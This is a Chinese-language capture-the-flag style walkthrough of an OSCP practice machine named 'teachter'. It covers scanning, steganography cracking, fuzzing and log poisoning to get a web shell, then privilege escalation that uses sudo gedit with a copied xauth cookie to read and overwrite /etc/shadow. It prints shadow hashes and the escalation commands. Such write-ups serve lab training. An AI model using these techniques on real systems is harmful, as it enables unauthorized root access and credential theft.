OSCP 靶场
靶场介绍
|
teachter |
easy |
StegSeek爆破、图片隐写、日志利用getshell、sudo—gedit&xauth提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.14
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 04:24 EST
Nmap scan report for 192.168.1.14
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 1e:21:69:d3:57:da:3a:04:0b:6f:f4:50:fb:97:13:10 (RSA)
| 256 36:ee:7f:57:1d:a5:b5:ce:1f:41:ba:b0:43:32:2e:ff (ECDSA)
|_ 256 f2:bd:80:dd:e5:05:02:49:c3:3b:9f:83:29:cb:54:96 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:4E:6E:DC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.1.14目录扫描
发现图片存在隐写
┌──(root㉿kali)-[~/下载]
└─# stegseek rabbit.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "rabbithole"
[i] Original filename: "secret.txt".
[i] Extracting to "rabbit.jpg.out".爆破后,获取到如下信息,但是不知道是啥东西。先放着。
权限获取
这里可以看到一个清除日志一个记录日志,还有一个接口时access.php
我们尝试对access.php 接口进行fuzz,爆破到了id参数
# ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.14/access.php?FUZZ=id --fs=12
可以发现通过这个id访问的记录会被记录到log.php
尝试传入phpinfo信息,然后访问成功。那么接下来我们直接写入shell。
这里发现存在一个pdf文件,可以看到存在一个密码
废了好大劲看出来,他就是:ThankYouTeachers
权限提升
gedit 是个文本编辑器,xauth命令则是用于编辑和显示连接 X 服务器时使用的授权信息。
接下来我们尝试使用编辑器gedit来编辑 root haciendo X11 并使用SSH进行转发
利用参考链接:https://www.thegeekdiary.com/how-to-set-x11-forwarding-export-remote-display-for-users-who-switch-accounts-using-sudo/利用过程如下:
1、使用kali 连接
ssh -X mrteacher@192.168.1.142、列出display,获取cookie
mrteacher@Teacher:~$ xauth list $DISPLAY
Teacher/unix:10 MIT-MAGIC-COOKIE-1 889261342a4e8cd77e68ea9b0f8888f9
mrteacher@Teacher:~$ echo $DISPLAY
localhost:10.03、添加cookie 到 sudo 的用户
sudo xauth add Teacher/unix:10 MIT-MAGIC-COOKIE-1 889261342a4e8cd77e68ea9b0f8888f94、使用sudo 执行如下命令读取shadow 文件
sudo gedit /etc/shadow
获取密码后我们使用john 对shadow 进行爆破,但是能否成功取决于密码。
这里我们将root 账户的hash 更改为mrteacher 然后保存,使用mrteacher 登录即可
root:$y$j9T$gOGCuq/iq84ssczF0sQBS1$Z6OoF9kPK824CPeFsPv.A9JvDFF5DEK0wB/neVm.Gi8:19228:0:99999:7:::
daemon:*:19228:0:99999:7:::
bin:*:19228:0:99999:7:::
sys:*:19228:0:99999:7:::
sync:*:19228:0:99999:7:::
games:*:19228:0:99999:7:::
man:*:19228:0:99999:7:::
lp:*:19228:0:99999:7:::
mail:*:19228:0:99999:7:::
news:*:19228:0:99999:7:::
uucp:*:19228:0:99999:7:::
proxy:*:19228:0:99999:7:::
www-data:*:19228:0:99999:7:::
backup:*:19228:0:99999:7:::
list:*:19228:0:99999:7:::
irc:*:19228:0:99999:7:::
gnats:*:19228:0:99999:7:::
nobody:*:19228:0:99999:7:::
_apt:*:19228:0:99999:7:::
systemd-network:*:19228:0:99999:7:::
systemd-resolve:*:19228:0:99999:7:::
messagebus:*:19228:0:99999:7:::
avahi-autoipd:*:19228:0:99999:7:::
sshd:*:19228:0:99999:7:::
mrteacher:$y$j9T$gOGCuq/iq84ssczF0sQBS1$Z6OoF9kPK824CPeFsPv.A9JvDFF5DEK0wB/neVm.Gi8:19228:0:99999:7:::
systemd-timesync:!*:19228::::::
systemd-coredump:!*:19228::::::我们也可以直接写入passwd 账户
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】teachter
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论